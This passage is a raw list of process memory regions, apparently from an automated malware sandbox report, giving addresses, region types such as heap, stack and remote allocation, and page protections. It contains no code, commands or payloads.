|
page read and write
|
||
154F5A6E000
|
trusted library allocation
|
page read and write
|
||
110E000
|
stack
|
page read and write
|
||
DF2000
|
unkown
|
page readonly
|
||
33A9000
|
trusted library allocation
|
page read and write
|
||
2B73000
|
trusted library allocation
|
page read and write
|
||
18F0000
|
heap
|
page read and write
|
||
2763FE30000
|
heap
|
page execute and read and write
|
||
2973000
|
trusted library allocation
|
page read and write
|
||
215E83CC000
|
trusted library allocation
|
page read and write
|
||
2DBB000
|
trusted library allocation
|
page read and write
|
||
5A00000
|
trusted library allocation
|
page read and write
|
||
215E6E89000
|
heap
|
page read and write
|
||
1A944B20000
|
heap
|
page read and write
|
||
5C2A000
|
trusted library allocation
|
page read and write
|
||
5F47000
|
heap
|
page read and write
|
||
3981000
|
trusted library allocation
|
page read and write
|
||
215E7685000
|
heap
|
page read and write
|
||
140475000
|
remote allocation
|
page execute and read and write
|
||
154F5F28000
|
trusted library allocation
|
page read and write
|
||
2763F630000
|
heap
|
page read and write
|
||
FA3000
|
trusted library allocation
|
page read and write
|
||
5CD0000
|
trusted library allocation
|
page read and write
|
||
154E3E75000
|
heap
|
page read and write
|
||
1404E5000
|
remote allocation
|
page execute and read and write
|
||
FF0000
|
heap
|
page read and write
|
||
6CE0000
|
trusted library allocation
|
page read and write
|
||
1A9466B7000
|
trusted library allocation
|
page read and write
|
||
140465000
|
remote allocation
|
page execute and read and write
|
||
205315CA000
|
trusted library allocation
|
page read and write
|
||
2052F7B0000
|
heap
|
page read and write
|
||
1B8062F0000
|
heap
|
page execute and read and write
|
||
15B2000
|
trusted library allocation
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
1124000
|
heap
|
page read and write
|
||
52BD000
|
stack
|
page read and write
|
||
27F0000
|
heap
|
page execute and read and write
|
||
CE7000
|
trusted library allocation
|
page execute and read and write
|
||
7FF7C0F44000
|
trusted library allocation
|
page read and write
|
||
1A946984000
|
trusted library allocation
|
page read and write
|
||
205318A6000
|
trusted library allocation
|
page read and write
|
||
154FE14E000
|
heap
|
page read and write
|
||
2DF7000
|
trusted library allocation
|
page read and write
|
||
2B40000
|
trusted library allocation
|
page read and write
|
||
2E80000
|
heap
|
page execute and read and write
|
||
DB41B47000
|
stack
|
page read and write
|
||
4B4E000
|
stack
|
page read and write
|
||
1080000
|
heap
|
page read and write
|
||
2D8D000
|
trusted library allocation
|
page read and write
|
||
5730000
|
trusted library allocation
|
page execute and read and write
|
||
205314B8000
|
trusted library allocation
|
page read and write
|
||
1A946500000
|
heap
|
page read and write
|
||
1590000
|
heap
|
page read and write
|
||
58C0000
|
trusted library allocation
|
page read and write
|
||
29A1000E000
|
trusted library allocation
|
page read and write
|
||
30F2000
|
trusted library allocation
|
page read and write
|
||
4331000
|
trusted library allocation
|
page read and write
|
||
2E14000
|
trusted library allocation
|
page read and write
|
||
215E877D000
|
trusted library allocation
|
page read and write
|
||
C7335FF000
|
stack
|
page read and write
|
||
2C3B000
|
trusted library allocation
|
page read and write
|
||
1339000
|
heap
|
page read and write
|
||
1A9469A5000
|
trusted library allocation
|
page read and write
|
||
6050000
|
heap
|
page read and write
|
||
64D0000
|
trusted library allocation
|
page execute and read and write
|
||
140789000
|
remote allocation
|
page execute and read and write
|
||
215E6EC0000
|
heap
|
page read and write
|
||
4221000
|
trusted library allocation
|
page read and write
|
||
1A944C50000
|
heap
|
page read and write
|
||
484D000
|
trusted library allocation
|
page read and write
|
||
31F8000
|
trusted library allocation
|
page read and write
|
||
322D000
|
trusted library allocation
|
page read and write
|
||
1A956951000
|
trusted library allocation
|
page read and write
|
||
20541975000
|
trusted library allocation
|
page read and write
|
||
1A946623000
|
trusted library allocation
|
page read and write
|
||
16C4000
|
heap
|
page read and write
|
||
5885000
|
heap
|
page read and write
|
||
15B6000
|
trusted library allocation
|
page execute and read and write
|
||
5AB0000
|
trusted library allocation
|
page execute and read and write
|
||
5708000
|
trusted library allocation
|
page read and write
|
||
29A71DC6000
|
heap
|
page read and write
|
||
5C4F000
|
trusted library allocation
|
page read and write
|
||
29A73A4F000
|
heap
|
page read and write
|
||
1A946892000
|
trusted library allocation
|
page read and write
|
||
215E87D6000
|
trusted library allocation
|
page read and write
|
||
154F5B27000
|
trusted library allocation
|
page read and write
|
||
20541A97000
|
trusted library allocation
|
page read and write
|
||
2E0B000
|
trusted library allocation
|
page read and write
|
||
2E1E000
|
trusted library allocation
|
page read and write
|
||
CD2000
|
trusted library allocation
|
page read and write
|
||
7FF7C0F9C000
|
trusted library allocation
|
page execute and read and write
|
||
FC0000
|
trusted library allocation
|
page read and write
|
||
20531835000
|
trusted library allocation
|
page read and write
|
||
41A1000
|
trusted library allocation
|
page read and write
|
||
2B52000
|
trusted library allocation
|
page read and write
|
||
2052F7E9000
|
heap
|
page read and write
|
||
2B5F000
|
trusted library allocation
|
page read and write
|
||
E1A8FFA000
|
stack
|
page read and write
|
||
30AE000
|
stack
|
page read and write
|
||
1A9567B7000
|
trusted library allocation
|
page read and write
|
||
1A9568BB000
|
trusted library allocation
|
page read and write
|
||
7FF7C0F3D000
|
trusted library allocation
|
page execute and read and write
|
||
5A7E000
|
stack
|
page read and write
|
||
5780000
|
trusted library allocation
|
page read and write
|
||
3D57000
|
trusted library allocation
|
page read and write
|
||
5DD8000
|
heap
|
page read and write
|
||
B37000
|
stack
|
page read and write
|
||
54C9000
|
trusted library allocation
|
page read and write
|
||
296B4722000
|
trusted library allocation
|
page read and write
|
||
296B2BF9000
|
heap
|
page read and write
|
||
1609000
|
trusted library allocation
|
page read and write
|
||
3EB1000
|
trusted library allocation
|
page read and write
|
||
49AE000
|
stack
|
page read and write
|
||
67BE000
|
stack
|
page read and write
|
||
5F50000
|
trusted library allocation
|
page execute and read and write
|
||
2C28000
|
trusted library allocation
|
page read and write
|
||
5560000
|
trusted library allocation
|
page execute and read and write
|
||
7FF7C0FDC000
|
trusted library allocation
|
page execute and read and write
|
||
36FF000
|
trusted library allocation
|
page read and write
|
||
3130000
|
trusted library allocation
|
page read and write
|
||
6280000
|
trusted library allocation
|
page read and write
|
||
7340000
|
trusted library allocation
|
page read and write
|
||
12DF000
|
heap
|
page read and write
|
||
CC3000
|
trusted library allocation
|
page read and write
|
||
1A956C7C000
|
trusted library allocation
|
page read and write
|
||
2763F652000
|
heap
|
page read and write
|
||
1B804680000
|
heap
|
page read and write
|
||
1A944C55000
|
heap
|
page read and write
|
||
7470000
|
trusted library allocation
|
page read and write
|
||
7FF7C0F4D000
|
trusted library allocation
|
page execute and read and write
|
||
4865000
|
trusted library allocation
|
page read and write
|
||
1407A7000
|
remote allocation
|
page execute and read and write
|
||
205416E7000
|
trusted library allocation
|
page read and write
|
||
58AB000
|
trusted library allocation
|
page read and write
|
||
E1A917D000
|
stack
|
page read and write
|
||
5ADE000
|
stack
|
page read and write
|
||
6510000
|
trusted library allocation
|
page read and write
|
||
E1A9278000
|
stack
|
page read and write
|
||
6DFE000
|
stack
|
page read and write
|
||
E1AA0C7000
|
stack
|
page read and write
|
||
20541681000
|
trusted library allocation
|
page read and write
|
||
75F0000
|
trusted library allocation
|
page read and write
|
||
1A9568FC000
|
trusted library allocation
|
page read and write
|
||
49C4000
|
trusted library allocation
|
page read and write
|
||
2052F880000
|
heap
|
page read and write
|
||
587E000
|
trusted library allocation
|
page read and write
|
||
F5B000
|
trusted library allocation
|
page execute and read and write
|
||
6000000
|
trusted library allocation
|
page read and write
|
||
5C49000
|
trusted library allocation
|
page read and write
|
||
2054164D000
|
trusted library allocation
|
page read and write
|
||
528E000
|
stack
|
page read and write
|
||
2158019A000
|
heap
|
page read and write
|
||
397D000
|
trusted library allocation
|
page read and write
|
||
1612000
|
trusted library allocation
|
page read and write
|
||
5790000
|
trusted library section
|
page read and write
|
||
215E8749000
|
trusted library allocation
|
page read and write
|
||
154F5C11000
|
trusted library allocation
|
page read and write
|
||
31BF000
|
stack
|
page read and write
|
||
1A94690B000
|
trusted library allocation
|
page read and write
|
||
2E61000
|
trusted library allocation
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
5F32000
|
trusted library allocation
|
page read and write
|
||
1B8046C2000
|
heap
|
page read and write
|
||
5BDE000
|
stack
|
page read and write
|
||
2C0D000
|
trusted library allocation
|
page read and write
|
||
C6E000
|
stack
|
page read and write
|
||
296B32C0000
|
heap
|
page readonly
|
||
2B4E000
|
trusted library allocation
|
page read and write
|
||
20531936000
|
trusted library allocation
|
page read and write
|
||
30A3000
|
trusted library allocation
|
page read and write
|
||
2E40000
|
trusted library allocation
|
page read and write
|
||
205314FD000
|
trusted library allocation
|
page read and write
|
||
1640000
|
trusted library allocation
|
page read and write
|
||
B92000
|
trusted library allocation
|
page read and write
|
||
1404E8000
|
remote allocation
|
page execute and read and write
|
||
163B000
|
trusted library allocation
|
page execute and read and write
|
||
583F000
|
stack
|
page read and write
|
||
154E5AA1000
|
trusted library allocation
|
page read and write
|
||
20541B98000
|
trusted library allocation
|
page read and write
|
||
7FF7C11D0000
|
trusted library allocation
|
page read and write
|
||
59C0000
|
trusted library allocation
|
page read and write
|
||
205312A0000
|
heap
|
page execute and read and write
|
||
7820000
|
trusted library allocation
|
page execute and read and write
|
||
2DD6000
|
trusted library allocation
|
page read and write
|
||
CDA000
|
trusted library allocation
|
page execute and read and write
|
||
205318EB000
|
trusted library allocation
|
page read and write
|
||
296B4767000
|
trusted library allocation
|
page read and write
|
||
5D8C000
|
heap
|
page read and write
|
||
2C26000
|
trusted library allocation
|
page read and write
|
||
29FF000
|
stack
|
page read and write
|
||
1A95679E000
|
trusted library allocation
|
page read and write
|
||
5C20000
|
trusted library allocation
|
page read and write
|
||
30F0000
|
trusted library allocation
|
page read and write
|
||
29A71CC0000
|
heap
|
page read and write
|
||
3403000
|
trusted library allocation
|
page read and write
|
||
2B5A000
|
trusted library allocation
|
page read and write
|
||
5E50000
|
heap
|
page read and write
|
||
1390000
|
heap
|
page read and write
|
||
28BE3FE000
|
stack
|
page read and write
|
||
1404E3000
|
remote allocation
|
page execute and read and write
|
||
2B0D000
|
trusted library allocation
|
page read and write
|
||
2E10000
|
trusted library allocation
|
page read and write
|
||
6180000
|
heap
|
page read and write
|
||
154FE15A000
|
heap
|
page read and write
|
||
215E9606000
|
trusted library allocation
|
page read and write
|
||
1404F9000
|
remote allocation
|
page execute and read and write
|
||
21580102000
|
heap
|
page read and write
|
||
2052FA75000
|
heap
|
page read and write
|
||
28626FD000
|
stack
|
page read and write
|
||
5860000
|
trusted library allocation
|
page execute and read and write
|
||
5F99000
|
heap
|
page read and write
|
||
29A00041000
|
trusted library allocation
|
page read and write
|
||
296B2C75000
|
heap
|
page read and write
|
||
1A944977000
|
heap
|
page read and write
|
||
F10000
|
heap
|
page read and write
|
||
12CE000
|
stack
|
page read and write
|
||
FA1000
|
trusted library allocation
|
page read and write
|
||
60F3000
|
heap
|
page read and write
|
||
7FF7C10F4000
|
trusted library allocation
|
page read and write
|
||
7FF7C0F40000
|
trusted library allocation
|
page read and write
|
||
63D43FE000
|
stack
|
page read and write
|
||
283E000
|
stack
|
page read and write
|
||
1A9567BB000
|
trusted library allocation
|
page read and write
|
||
2C37000
|
trusted library allocation
|
page read and write
|
||
1A946A67000
|
trusted library allocation
|
page read and write
|
||
1430000
|
trusted library allocation
|
page read and write
|
||
5708000
|
heap
|
page read and write
|
||
6004000
|
heap
|
page read and write
|
||
1A956943000
|
trusted library allocation
|
page read and write
|
||
F20000
|
heap
|
page read and write
|
||
7490000
|
trusted library allocation
|
page read and write
|
||
154E3D90000
|
heap
|
page read and write
|
||
5480000
|
trusted library allocation
|
page read and write
|
||
581F000
|
stack
|
page read and write
|
||
296B44A1000
|
trusted library allocation
|
page read and write
|
||
29A71F00000
|
heap
|
page read and write
|
||
4191000
|
trusted library allocation
|
page read and write
|
||
C7345FE000
|
stack
|
page read and write
|
||
5EE0000
|
trusted library section
|
page read and write
|
||
2B6B000
|
trusted library allocation
|
page read and write
|
||
5750000
|
trusted library allocation
|
page execute and read and write
|
||
296B45BA000
|
trusted library allocation
|
page read and write
|
||
205319F2000
|
trusted library allocation
|
page read and write
|
||
58D0000
|
trusted library allocation
|
page read and write
|
||
20531742000
|
trusted library allocation
|
page read and write
|
||
4DAE000
|
stack
|
page read and write
|
||
34A9000
|
trusted library allocation
|
page read and write
|
||
E1A9F4F000
|
stack
|
page read and write
|
||
2740D630000
|
heap
|
page read and write
|
||
276403E0000
|
trusted library allocation
|
page read and write
|
||
20541743000
|
trusted library allocation
|
page read and write
|
||
2F63000
|
trusted library allocation
|
page read and write
|
||
146E000
|
stack
|
page read and write
|
||
1A956781000
|
trusted library allocation
|
page read and write
|
||
215E6F90000
|
heap
|
page readonly
|
||
1970000
|
heap
|
page read and write
|
||
20531539000
|
trusted library allocation
|
page read and write
|
||
63D4A3C000
|
stack
|
page read and write
|
||
12AE000
|
heap
|
page read and write
|
||
15CB000
|
trusted library allocation
|
page execute and read and write
|
||
2DDE000
|
trusted library allocation
|
page read and write
|
||
7FF7C0F33000
|
trusted library allocation
|
page read and write
|
||
2C42000
|
trusted library allocation
|
page read and write
|
||
472F000
|
trusted library allocation
|
page read and write
|
||
1A946A6D000
|
trusted library allocation
|
page read and write
|
||
F80000
|
heap
|
page read and write
|
||
159E000
|
heap
|
page read and write
|
||
2862AFE000
|
stack
|
page read and write
|
||
59D0000
|
trusted library allocation
|
page read and write
|
||
1A956B77000
|
trusted library allocation
|
page read and write
|
||
55A0000
|
trusted library allocation
|
page read and write
|
||
2052F9E0000
|
heap
|
page read and write
|
||
5890000
|
trusted library allocation
|
page read and write
|
||
D46000
|
heap
|
page read and write
|
||
2E3E000
|
stack
|
page read and write
|
||
4504000
|
trusted library allocation
|
page read and write
|
||
5641000
|
heap
|
page read and write
|
||
2C3F000
|
trusted library allocation
|
page read and write
|
||
80D0000
|
trusted library allocation
|
page read and write
|
||
103E000
|
stack
|
page read and write
|
||
F1F000
|
stack
|
page read and write
|
||
2C6D000
|
trusted library allocation
|
page read and write
|
||
5790000
|
heap
|
page read and write
|
||
7FF7C10E0000
|
trusted library allocation
|
page read and write
|
||
129E000
|
heap
|
page read and write
|
||
215E6FD0000
|
trusted library allocation
|
page read and write
|
||
A83FFD000
|
stack
|
page read and write
|
||
205314BE000
|
trusted library allocation
|
page read and write
|
||
2E32BFE000
|
stack
|
page read and write
|
||
3FBC000
|
trusted library allocation
|
page read and write
|
||
29B3000
|
trusted library allocation
|
page read and write
|
||
1A944BA0000
|
trusted library allocation
|
page read and write
|
||
2052F816000
|
heap
|
page read and write
|
||
5590000
|
trusted library allocation
|
page read and write
|
||
63D48B8000
|
stack
|
page read and write
|
||
57A9000
|
heap
|
page read and write
|
||
2B5D000
|
trusted library allocation
|
page read and write
|
||
8090000
|
trusted library allocation
|
page execute and read and write
|
||
1020000
|
trusted library allocation
|
page read and write
|
||
1235000
|
heap
|
page read and write
|
||
12D50C58000
|
heap
|
page read and write
|
||
1A956D44000
|
trusted library allocation
|
page read and write
|
||
2052FA40000
|
trusted library allocation
|
page read and write
|
||
296B2C4E000
|
heap
|
page read and write
|
||
54E0000
|
trusted library allocation
|
page read and write
|
||
13FD000
|
trusted library allocation
|
page execute and read and write
|
||
331A000
|
trusted library allocation
|
page read and write
|
||
13E4000
|
trusted library allocation
|
page read and write
|
||
1060000
|
heap
|
page read and write
|
||
322F000
|
trusted library allocation
|
page read and write
|
||
21580080000
|
heap
|
page read and write
|
||
20541466000
|
trusted library allocation
|
page read and write
|
||
1A94669C000
|
trusted library allocation
|
page read and write
|
||
29A71E00000
|
heap
|
page read and write
|
||
53BD000
|
stack
|
page read and write
|
||
140784000
|
remote allocation
|
page execute and read and write
|
||
154E3E40000
|
trusted library allocation
|
page read and write
|
||
5C4D000
|
trusted library allocation
|
page read and write
|
||
20541675000
|
trusted library allocation
|
page read and write
|
||
1490000
|
trusted library allocation
|
page read and write
|
||
E1A8EFF000
|
stack
|
page read and write
|
||
7FF7C1000000
|
trusted library allocation
|
page execute and read and write
|
||
1200000
|
heap
|
page read and write
|
||
57DE000
|
heap
|
page read and write
|
||
30B0000
|
heap
|
page read and write
|
||
BD0000
|
heap
|
page read and write
|
||
5AC0000
|
trusted library allocation
|
page read and write
|
||
746B000
|
trusted library allocation
|
page read and write
|
||
1B8063B1000
|
trusted library allocation
|
page read and write
|
||
1B804850000
|
heap
|
page read and write
|
||
31C1000
|
trusted library allocation
|
page read and write
|
||
1B8046A9000
|
heap
|
page read and write
|
||
29D0000
|
trusted library allocation
|
page read and write
|
||
63D4837000
|
stack
|
page read and write
|
||
30B9000
|
heap
|
page read and write
|
||
2E21000
|
trusted library allocation
|
page read and write
|
||
7FF7C10C0000
|
trusted library allocation
|
page read and write
|
||
21580000000
|
heap
|
page execute and read and write
|
||
2E06000
|
trusted library allocation
|
page read and write
|
||
2B79000
|
trusted library allocation
|
page read and write
|
||
30D9000
|
trusted library allocation
|
page read and write
|
||
2F89000
|
heap
|
page read and write
|
||
2740D6B8000
|
heap
|
page read and write
|
||
1404DA000
|
remote allocation
|
page execute and read and write
|
||
296B2BD0000
|
heap
|
page read and write
|
||
AF7000
|
stack
|
page read and write
|
||
114F000
|
heap
|
page read and write
|
||
205314CD000
|
trusted library allocation
|
page read and write
|
||
E1A957C000
|
stack
|
page read and write
|
||
1154000
|
trusted library allocation
|
page read and write
|
||
215E7630000
|
heap
|
page read and write
|
||
1187000
|
trusted library allocation
|
page execute and read and write
|
||
10EC000
|
stack
|
page read and write
|
||
2B4E000
|
stack
|
page read and write
|
||
2B07000
|
trusted library allocation
|
page read and write
|
||
3545000
|
trusted library allocation
|
page read and write
|
||
5EA2000
|
heap
|
page read and write
|
||
2740D6E6000
|
heap
|
page read and write
|
||
2F72000
|
trusted library allocation
|
page read and write
|
||
58BF000
|
trusted library allocation
|
page read and write
|
||
DB419CE000
|
stack
|
page read and write
|
||
E01000
|
heap
|
page read and write
|
||
29A71DB5000
|
heap
|
page read and write
|
||
2052F7ED000
|
heap
|
page read and write
|
||
2AFF000
|
trusted library allocation
|
page read and write
|
||
49FB000
|
trusted library allocation
|
page read and write
|
||
296B3325000
|
heap
|
page read and write
|
||
F2D000
|
trusted library allocation
|
page execute and read and write
|
||
2AA4000
|
trusted library allocation
|
page read and write
|
||
2AD9000
|
trusted library allocation
|
page read and write
|
||
59A0000
|
trusted library allocation
|
page execute and read and write
|
||
29A10015000
|
trusted library allocation
|
page read and write
|
||
6140000
|
trusted library allocation
|
page execute and read and write
|
||
2763FF00000
|
heap
|
page read and write
|
||
56AA000
|
heap
|
page read and write
|
||
7FF7C0F4D000
|
trusted library allocation
|
page execute and read and write
|
||
2BCB000
|
trusted library allocation
|
page read and write
|
||
1A956CC1000
|
trusted library allocation
|
page read and write
|
||
296B2BA0000
|
heap
|
page read and write
|
||
2A10000
|
trusted library allocation
|
page read and write
|
||
7FF7C10E2000
|
trusted library allocation
|
page read and write
|
||
15BA000
|
trusted library allocation
|
page execute and read and write
|
||
2DE4000
|
trusted library allocation
|
page read and write
|
||
205314D3000
|
trusted library allocation
|
page read and write
|
||
56A9000
|
trusted library allocation
|
page read and write
|
||
55DF000
|
stack
|
page read and write
|
||
7FF7C0F22000
|
trusted library allocation
|
page read and write
|
||
1B804686000
|
heap
|
page read and write
|
||
69FF000
|
stack
|
page read and write
|
||
576E000
|
trusted library allocation
|
page read and write
|
||
215E7869000
|
trusted library allocation
|
page read and write
|
||
2DC1000
|
trusted library allocation
|
page read and write
|
||
5AF0000
|
trusted library allocation
|
page execute and read and write
|
||
296B47A7000
|
trusted library allocation
|
page read and write
|
||
5A90000
|
trusted library allocation
|
page read and write
|
||
154E5A50000
|
heap
|
page execute and read and write
|
||
205316D6000
|
trusted library allocation
|
page read and write
|
||
1404DD000
|
remote allocation
|
page execute and read and write
|
||
5D62000
|
heap
|
page read and write
|
||
F86000
|
heap
|
page read and write
|
||
215E7035000
|
heap
|
page read and write
|
||
2F46000
|
trusted library allocation
|
page read and write
|
||
10D5000
|
heap
|
page read and write
|
||
1A9569DE000
|
trusted library allocation
|
page read and write
|
||
2FCD000
|
trusted library allocation
|
page read and write
|
||
2F4C000
|
trusted library allocation
|
page read and write
|
||
1182000
|
trusted library allocation
|
page read and write
|
||
1A946660000
|
trusted library allocation
|
page read and write
|
||
7FF7C1006000
|
trusted library allocation
|
page execute and read and write
|
||
3921000
|
trusted library allocation
|
page read and write
|
||
1A944B40000
|
heap
|
page read and write
|
||
3471000
|
trusted library allocation
|
page read and write
|
||
5A10000
|
trusted library allocation
|
page read and write
|
||
57EB000
|
heap
|
page read and write
|
||
310D000
|
trusted library allocation
|
page read and write
|
||
2DA6000
|
trusted library allocation
|
page read and write
|
||
34A4000
|
trusted library allocation
|
page read and write
|
||
20531659000
|
trusted library allocation
|
page read and write
|
||
154F5A81000
|
trusted library allocation
|
page read and write
|
||
49D1000
|
trusted library allocation
|
page read and write
|
||
20531714000
|
trusted library allocation
|
page read and write
|
||
5D30000
|
trusted library allocation
|
page execute and read and write
|
||
D44000
|
heap
|
page read and write
|
||
3500000
|
trusted library allocation
|
page read and write
|
||
1A94686A000
|
trusted library allocation
|
page read and write
|
||
2A40000
|
heap
|
page read and write
|
||
32CE000
|
trusted library allocation
|
page read and write
|
||
52BE000
|
stack
|
page read and write
|
||
63D447F000
|
stack
|
page read and write
|
||
2E50000
|
heap
|
page execute and read and write
|
||
5CDE000
|
stack
|
page read and write
|
||
296B32B0000
|
trusted library allocation
|
page read and write
|
||
1627000
|
trusted library allocation
|
page execute and read and write
|
||
205314C7000
|
trusted library allocation
|
page read and write
|
||
29D4000
|
trusted library allocation
|
page read and write
|
||
CD6000
|
trusted library allocation
|
page execute and read and write
|
||
58BD000
|
trusted library allocation
|
page read and write
|
||
154F5DF4000
|
trusted library allocation
|
page read and write
|
||
215E6ECE000
|
heap
|
page read and write
|
||
F7E000
|
stack
|
page read and write
|
||
1A944B80000
|
trusted library allocation
|
page read and write
|
||
547D000
|
stack
|
page read and write
|
||
5712000
|
trusted library allocation
|
page read and write
|
||
2F5F000
|
trusted library allocation
|
page read and write
|
||
154FDA60000
|
trusted library allocation
|
page read and write
|
||
2B03000
|
trusted library allocation
|
page read and write
|
||
59F0000
|
trusted library allocation
|
page read and write
|
||
63D44F9000
|
stack
|
page read and write
|
||
551B000
|
trusted library allocation
|
page read and write
|
||
63D4ABE000
|
stack
|
page read and write
|
||
115D000
|
trusted library allocation
|
page execute and read and write
|
||
20541926000
|
trusted library allocation
|
page read and write
|
||
2053150A000
|
trusted library allocation
|
page read and write
|
||
205417F4000
|
trusted library allocation
|
page read and write
|
||
1B8166E4000
|
trusted library allocation
|
page read and write
|
||
7FF7C11F0000
|
trusted library allocation
|
page read and write
|
||
2F77000
|
trusted library allocation
|
page read and write
|
||
517E000
|
stack
|
page read and write
|
||
159D000
|
trusted library allocation
|
page execute and read and write
|
||
B82000
|
trusted library allocation
|
page read and write
|
||
2763F69E000
|
heap
|
page read and write
|
||
5CBE000
|
stack
|
page read and write
|
||
59B0000
|
trusted library allocation
|
page read and write
|
||
74B0000
|
trusted library allocation
|
page execute and read and write
|
||
3BAD000
|
trusted library allocation
|
page read and write
|
||
4EFF000
|
stack
|
page read and write
|
||
12D526F0000
|
heap
|
page read and write
|
||
3265000
|
trusted library allocation
|
page read and write
|
||
28BE7FD000
|
stack
|
page read and write
|
||
117A000
|
trusted library allocation
|
page execute and read and write
|
||
29A71F60000
|
trusted library allocation
|
page read and write
|
||
47ED000
|
trusted library allocation
|
page read and write
|
||
2053164C000
|
trusted library allocation
|
page read and write
|
||
2052FA20000
|
trusted library allocation
|
page read and write
|
||
5CFE000
|
stack
|
page read and write
|
||
1A956ACD000
|
trusted library allocation
|
page read and write
|
||
2B90000
|
heap
|
page execute and read and write
|
||
6000000
|
heap
|
page read and write
|
||
40BC000
|
trusted library allocation
|
page read and write
|
||
2B39000
|
trusted library allocation
|
page read and write
|
||
2AE9000
|
trusted library allocation
|
page read and write
|
||
205315B7000
|
trusted library allocation
|
page read and write
|
||
1A956911000
|
trusted library allocation
|
page read and write
|
||
309B000
|
trusted library allocation
|
page read and write
|
||
1610000
|
trusted library allocation
|
page read and write
|
||
B70000
|
heap
|
page read and write
|
||
20541BD0000
|
trusted library allocation
|
page read and write
|
||
5980000
|
trusted library allocation
|
page read and write
|
||
6640000
|
trusted library allocation
|
page read and write
|
||
3111000
|
trusted library allocation
|
page read and write
|
||
20541952000
|
trusted library allocation
|
page read and write
|
||
215E95BC000
|
trusted library allocation
|
page read and write
|
||
F3F000
|
stack
|
page read and write
|
||
29A0036B000
|
trusted library allocation
|
page read and write
|
||
5700000
|
trusted library allocation
|
page read and write
|
||
1B804620000
|
heap
|
page read and write
|
||
109E000
|
heap
|
page read and write
|
||
DB40E7E000
|
stack
|
page read and write
|
||
2763F900000
|
trusted library allocation
|
page read and write
|
||
1A94498D000
|
heap
|
page read and write
|
||
1637000
|
trusted library allocation
|
page execute and read and write
|
||
2740D6CE000
|
heap
|
page read and write
|
||
296B32D0000
|
heap
|
page execute and read and write
|
||
2E35000
|
trusted library allocation
|
page read and write
|
||
F94000
|
trusted library allocation
|
page read and write
|
||
215E95E1000
|
trusted library allocation
|
page read and write
|
||
13CF000
|
stack
|
page read and write
|
||
1510000
|
heap
|
page read and write
|
||
3BB1000
|
trusted library allocation
|
page read and write
|
||
5EA8000
|
heap
|
page read and write
|
||
54D0000
|
trusted library allocation
|
page execute and read and write
|
||
2C6F000
|
trusted library allocation
|
page read and write
|
||
58D0000
|
trusted library allocation
|
page execute and read and write
|
||
5A00000
|
trusted library allocation
|
page read and write
|
||
56BA000
|
heap
|
page read and write
|
||
321E000
|
stack
|
page read and write
|
||
18E2000
|
trusted library allocation
|
page read and write
|
||
7FF7C0F20000
|
trusted library allocation
|
page read and write
|
||
7FF7C1140000
|
trusted library allocation
|
page read and write
|
||
5320000
|
trusted library allocation
|
page read and write
|
||
5650000
|
trusted library allocation
|
page read and write
|
||
A3C000
|
stack
|
page read and write
|
||
1B8049A5000
|
heap
|
page read and write
|
||
2740D6B0000
|
heap
|
page read and write
|
||
59FF000
|
stack
|
page read and write
|
||
215801C7000
|
heap
|
page read and write
|
||
5A00000
|
trusted library allocation
|
page read and write
|
||
2053191E000
|
trusted library allocation
|
page read and write
|
||
13F0000
|
trusted library allocation
|
page read and write
|
||
E1A94FF000
|
stack
|
page read and write
|
||
2C3C000
|
trusted library allocation
|
page read and write
|
||
5DCE000
|
stack
|
page read and write
|
||
294F000
|
trusted library allocation
|
page read and write
|
||
DB41CCE000
|
stack
|
page read and write
|
||
140785000
|
remote allocation
|
page execute and read and write
|
||
5E70000
|
trusted library allocation
|
page read and write
|
||
215E6E45000
|
heap
|
page read and write
|
||
5F30000
|
trusted library allocation
|
page read and write
|
||
351C000
|
trusted library allocation
|
page read and write
|
||
20531601000
|
trusted library allocation
|
page read and write
|
||
2DFD000
|
trusted library allocation
|
page read and write
|
||
33E6000
|
trusted library allocation
|
page read and write
|
||
5AF0000
|
trusted library allocation
|
page read and write
|
||
1A946608000
|
trusted library allocation
|
page read and write
|
||
11E7000
|
stack
|
page read and write
|
||
1A956D00000
|
trusted library allocation
|
page read and write
|
||
13E0000
|
trusted library allocation
|
page read and write
|
||
1A946850000
|
trusted library allocation
|
page read and write
|
||
5F13000
|
heap
|
page read and write
|
||
16AB000
|
heap
|
page read and write
|
||
49F9000
|
trusted library allocation
|
page read and write
|
||
4A4E000
|
stack
|
page read and write
|
||
30C2000
|
trusted library allocation
|
page read and write
|
||
1266000
|
heap
|
page read and write
|
||
5520000
|
trusted library allocation
|
page read and write
|
||
1A956CBC000
|
trusted library allocation
|
page read and write
|
||
2D8F000
|
trusted library allocation
|
page read and write
|
||
F80000
|
trusted library allocation
|
page read and write
|
||
1230000
|
heap
|
page read and write
|
||
537E000
|
stack
|
page read and write
|
||
550E000
|
stack
|
page read and write
|
||
7460000
|
trusted library allocation
|
page read and write
|
||
2ADB000
|
trusted library allocation
|
page read and write
|
||
5690000
|
trusted library allocation
|
page execute and read and write
|
||
1404EA000
|
remote allocation
|
page execute and read and write
|
||
20531756000
|
trusted library allocation
|
page read and write
|
||
296B2C36000
|
heap
|
page read and write
|
||
1A94672F000
|
trusted library allocation
|
page read and write
|
||
1404EF000
|
remote allocation
|
page execute and read and write
|
||
5A30000
|
trusted library allocation
|
page read and write
|
||
CBD000
|
trusted library allocation
|
page execute and read and write
|
||
D28000
|
heap
|
page read and write
|
||
63D42FE000
|
stack
|
page read and write
|
||
E1A92FD000
|
stack
|
page read and write
|
||
7330000
|
trusted library allocation
|
page read and write
|
||
1412000
|
trusted library allocation
|
page read and write
|
||
1590000
|
trusted library allocation
|
page read and write
|
||
29E1000
|
trusted library allocation
|
page read and write
|
||
2E50000
|
trusted library allocation
|
page read and write
|
||
12D50C50000
|
heap
|
page read and write
|
||
15C2000
|
trusted library allocation
|
page read and write
|
||
7FF7C11B0000
|
trusted library allocation
|
page read and write
|
||
63D457F000
|
stack
|
page read and write
|
||
7620000
|
trusted library allocation
|
page execute and read and write
|
||
2E40000
|
trusted library allocation
|
page execute and read and write
|
||
3120000
|
trusted library allocation
|
page read and write
|
||
2E0E000
|
trusted library allocation
|
page read and write
|
||
3462000
|
trusted library allocation
|
page read and write
|
||
176E000
|
stack
|
page read and write
|
||
2F58000
|
trusted library allocation
|
page read and write
|
||
2054199A000
|
trusted library allocation
|
page read and write
|
||
2D95000
|
trusted library allocation
|
page read and write
|
||
18F9000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
1A956C95000
|
trusted library allocation
|
page read and write
|
||
293F000
|
stack
|
page read and write
|
||
4420000
|
trusted library allocation
|
page read and write
|
||
1150000
